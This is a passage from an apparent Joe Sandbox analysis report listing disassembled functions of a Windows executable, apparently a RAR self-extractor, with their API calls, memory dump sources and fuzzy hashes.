                                                                                                                                        • Instruction ID: d04e4fb0a9049899b0c0c4efe22d19206b475612fd6ed90ffe421a76d12f2239
                                                                                                                                        • Opcode Fuzzy Hash: 0a82f352a3d818f901137a6f24d8d48b1c750d2db644e987544015eee9663663
                                                                                                                                        • Instruction Fuzzy Hash: DB4138B2408305AFC710DF65D8809ABFBF9FF88754F004A2EF59692610E739E548DB96
                                                                                                                                        Function 007BC56D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007BCCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 007BC5AF
                                                                                                                                        • __fassign.LIBCMT ref: 007BC62A
                                                                                                                                        • __fassign.LIBCMT ref: 007BC645
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007BC66B
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,007BCCE2,00000000,?,?,?,?,?,?,?,?,?,007BCCE2,00000000), ref: 007BC68A
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,007BCCE2,00000000,?,?,?,?,?,?,?,?,?,007BCCE2,00000000), ref: 007BC6C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                        • Opcode ID: 0f7598ee92f4527ce1a536a2894f803d506c63e1bb40fcec2f0af182f9ddec45
                                                                                                                                        • Instruction ID: aef069b646b191bce6cd1f491df269e8476fd32fc6da4619db7892732f855080
                                                                                                                                        • Opcode Fuzzy Hash: 0f7598ee92f4527ce1a536a2894f803d506c63e1bb40fcec2f0af182f9ddec45
                                                                                                                                        • Instruction Fuzzy Hash: E7518FB1900249AFDB11CFA8DC85FEEBBF4EF19300F14815AE555E7251E738A940CBA5
                                                                                                                                        Function 007AB0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 007AB0EF
                                                                                                                                        • _swprintf.LIBCMT ref: 007AB123
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,007D3122), ref: 007AB143
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 007AB176
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007AB257
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                        • String ID: %s%s%u
                                                                                                                                        • API String ID: 2892007947-1360425832
                                                                                                                                        • Opcode ID: 42fea62bf182a63af428e34b26ead4e06dd01e679fb98bee42a648a4d3488d32
                                                                                                                                        • Instruction ID: 53d61a7671acaf4115f30395057b838c32f3a732ce8a01586f6bda86f00e6f9c
                                                                                                                                        • Opcode Fuzzy Hash: 42fea62bf182a63af428e34b26ead4e06dd01e679fb98bee42a648a4d3488d32
                                                                                                                                        • Instruction Fuzzy Hash: AE418F7190021DEEEF25DB60DC85EEE77BCEB49304F4081A6F508E6052EB799B848F95
                                                                                                                                        Function 0079C91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                                                                        • String ID: %08x
                                                                                                                                        • API String ID: 1593746830-3682738293
                                                                                                                                        • Opcode ID: cbf7e4ae0e5bd619c0e044eace7dc968f6068c3de7a01a2e14179afb50c5ad7f
                                                                                                                                        • Instruction ID: e272b94683f2aadb6b645b5871ce1c0617e38d55a64d0fac1c497861c937dd25
                                                                                                                                        • Opcode Fuzzy Hash: cbf7e4ae0e5bd619c0e044eace7dc968f6068c3de7a01a2e14179afb50c5ad7f
                                                                                                                                        • Instruction Fuzzy Hash: 0241C832908358EAEF32E624EC49FBB73DCEB85750F14052AF544A7182D63DAD44C2A1
                                                                                                                                        Function 007A859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 007A85B5
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007A85DA
                                                                                                                                        • ShowWindow.USER32(?,00000005,?), ref: 007A8671
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007A8679
                                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 007A868F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$RectText
                                                                                                                                        • String ID: RarHtmlClassName
                                                                                                                                        • API String ID: 3937224194-1658105358
                                                                                                                                        • Opcode ID: 109de081a11ddffe03e4e3e3fe92da7cd3b0528e2a955df60adf0a96b96f5aea
                                                                                                                                        • Instruction ID: 8a7e74dad9c06b355f3279fd87fc67958872db1a8ef1f98159dd66d4a9ce6686
                                                                                                                                        • Opcode Fuzzy Hash: 109de081a11ddffe03e4e3e3fe92da7cd3b0528e2a955df60adf0a96b96f5aea
                                                                                                                                        • Instruction Fuzzy Hash: 7B31BE72401208FFD720AF649D48F1BBBA8EB89702F048559FD099A152DB38E810CBA6
                                                                                                                                        Function 007B930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B92D3: _free.LIBCMT ref: 007B92FC
                                                                                                                                        • _free.LIBCMT ref: 007B935D
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B9368
                                                                                                                                        • _free.LIBCMT ref: 007B9373
                                                                                                                                        • _free.LIBCMT ref: 007B93C7
                                                                                                                                        • _free.LIBCMT ref: 007B93D2
                                                                                                                                        • _free.LIBCMT ref: 007B93DD
                                                                                                                                        • _free.LIBCMT ref: 007B93E8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                                                        • Instruction ID: 4fbccaaa7f559945fde1d361b22d219ca1270783ab03d73891efd0381aaea65f
                                                                                                                                        • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                                                        • Instruction Fuzzy Hash: E411EC72E41B04FBDA20BBB4CC4BFCB77DDAF05714F804855B3A9A6192DA7DB9048A50
                                                                                                                                        Function 007B0C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,007B0C0B,007AE662), ref: 007B0C22
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007B0C30
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B0C49
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007B0C0B,007AE662), ref: 007B0C9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        • Opcode ID: c060b5b6e6eff0db781f382c2e0444d3cfbaf624c639c001dbdddf74e81f4247
                                                                                                                                        • Instruction ID: 07e4a97a8b37a5706b09004b07689d578cc0dc1439f2e87dace3ff2ca2fe7490
                                                                                                                                        • Opcode Fuzzy Hash: c060b5b6e6eff0db781f382c2e0444d3cfbaf624c639c001dbdddf74e81f4247
                                                                                                                                        • Instruction Fuzzy Hash: E6017532249719AFA71526B46C8EFEB2F54EB117BAB74433EF514550E1EB2D880051E8
                                                                                                                                        Function 007AC7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                        • API String ID: 0-1718035505
                                                                                                                                        • Opcode ID: 051743e2cb6db889eef9baac4aaf8964958692862ae5fbf5a9d66e67fb0b97a1
                                                                                                                                        • Instruction ID: de1f40dc37c186d127a0becc26211010a2f36a931043f1969b4abeeabdec3893
                                                                                                                                        • Opcode Fuzzy Hash: 051743e2cb6db889eef9baac4aaf8964958692862ae5fbf5a9d66e67fb0b97a1
                                                                                                                                        • Instruction Fuzzy Hash: 4D0128B6B82221BB4F220F746CC5AA623C4BA877A1312833DE520D7101E71CD880A7E9
                                                                                                                                        Function 007A0050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A00AE
                                                                                                                                          • Part of subcall function 0079A8E0: GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007A00D0
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007A00EA
                                                                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007A00FB
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A010B
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A0117
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                        • Opcode ID: e9fa38becd0225383b9c987a1c3a13e036db5626c4b95f9f7a6d6cfd7dd6fc4b
                                                                                                                                        • Instruction ID: dd1c6f36129c531e7da894aef7f124d06b8711619c7c35f52cb01a96b9479574
                                                                                                                                        • Opcode Fuzzy Hash: e9fa38becd0225383b9c987a1c3a13e036db5626c4b95f9f7a6d6cfd7dd6fc4b
                                                                                                                                        • Instruction Fuzzy Hash: E031C47A108345DFC704DFA5C98499BB7E8BF98704F04491EF999C3210E634E549CB6A
                                                                                                                                        Function 007A8206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: 31dda62673a9f15c56ebd535f21121b2dfe13382be963bfb881cd965737275f0
                                                                                                                                        • Instruction ID: 3dec7fa4539f8e23355f82bd9e819af7df67f648b05e4a222e314e7cdd0b5df7
                                                                                                                                        • Opcode Fuzzy Hash: 31dda62673a9f15c56ebd535f21121b2dfe13382be963bfb881cd965737275f0
                                                                                                                                        • Instruction Fuzzy Hash: 4E2188B260460AABD7845A10DC81F7777ACBFD6764B14872CFC089A142F67CDD454792
                                                                                                                                        Function 0079FB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079FB07
                                                                                                                                        • EnterCriticalSection.KERNEL32(007D1E74,00000000,?,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?), ref: 0079FB15
                                                                                                                                        • new.LIBCMT ref: 0079FB35
                                                                                                                                        • new.LIBCMT ref: 0079FB6B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?,00008000,?), ref: 0079FB8B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?,00008000,?), ref: 0079FB96
                                                                                                                                          • Part of subcall function 0079F930: InitializeCriticalSection.KERNEL32(000001A0,007D1E74,00000000,?,?,0079FB88,00000020,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?), ref: 0079F969
                                                                                                                                          • Part of subcall function 0079F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F973
                                                                                                                                          • Part of subcall function 0079F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F983
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3919453512-0
                                                                                                                                        • Opcode ID: cdc16342a1e48372dbce415db809b2bcf3f47a54431834f823808fa2c4fe1164
                                                                                                                                        • Instruction ID: 1e19e1bc2e03d800e07a453e812107b4b9e305c90a0fd0c4ce428b4c14f0ce01
                                                                                                                                        • Opcode Fuzzy Hash: cdc16342a1e48372dbce415db809b2bcf3f47a54431834f823808fa2c4fe1164
                                                                                                                                        • Instruction Fuzzy Hash: F4115E74A01211EBDB049F78FC19BAD77B8AB89B65F00423EF815D7390DBBC88009A95
                                                                                                                                        Function 007B631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,007CCBE8,007B2674,007CCBE8,?,?,007B2213,?,?,007CCBE8), ref: 007B6323
                                                                                                                                        • _free.LIBCMT ref: 007B6356
                                                                                                                                        • _free.LIBCMT ref: 007B637E
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B638B
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6397
                                                                                                                                        • _abort.LIBCMT ref: 007B639D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                        • Opcode ID: 1154d9f0830e95a36c95bd011ee464e4552ea1f90b08fff520f9a1a94928efc6
                                                                                                                                        • Instruction ID: 4bcb5b7e21c12bf8500e6ad3cdd32346e7432eae65dcff19ce4710b665ffec69
                                                                                                                                        • Opcode Fuzzy Hash: 1154d9f0830e95a36c95bd011ee464e4552ea1f90b08fff520f9a1a94928efc6
                                                                                                                                        • Instruction Fuzzy Hash: C9F02832605B00E6C71127396C0EFDA2799ABC2772F254128F624A31D1FF3D884146A5
                                                                                                                                        Function 007AA8D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperW.USER32(?,?,?,?,00001000), ref: 007AA92C
                                                                                                                                        • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 007AA953
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharUpper
                                                                                                                                        • String ID: *a}$-
                                                                                                                                        • API String ID: 9403516-651630094
                                                                                                                                        • Opcode ID: ec00ee8af8348a8798e1fe660d7e72ce22584d06d352a4a420a1ac143f6f2a77
                                                                                                                                        • Instruction ID: 78d7d2552eff0e91d3ff4767ca078c5c987689a1097cb5e9e033240f70d35041
                                                                                                                                        • Opcode Fuzzy Hash: ec00ee8af8348a8798e1fe660d7e72ce22584d06d352a4a420a1ac143f6f2a77
                                                                                                                                        • Instruction Fuzzy Hash: C321057200430AFAD3209B28C80DBBBA7A9E7C7315F02461BF484C2941E77DE888D363
                                                                                                                                        Function 007AB820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007AB86B
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 007AB881
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007AB89B
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066), ref: 007AB8A6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: RENAMEDLG
                                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                                        • Opcode ID: 0c7df42a2e16af508ccaaff1cf4620c7044079304b843c9781dacb69555d6c16
                                                                                                                                        • Instruction ID: c10b0402d2d11d790c03c7562c5479d3712e9bf3de01224da504ade86794537a
                                                                                                                                        • Opcode Fuzzy Hash: 0c7df42a2e16af508ccaaff1cf4620c7044079304b843c9781dacb69555d6c16
                                                                                                                                        • Instruction Fuzzy Hash: 55012833A402157AD1514F699E48F3B7B6CEBCBF41F008519F204B60A2C35EAC0497B7
                                                                                                                                        Function 007B4ADF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
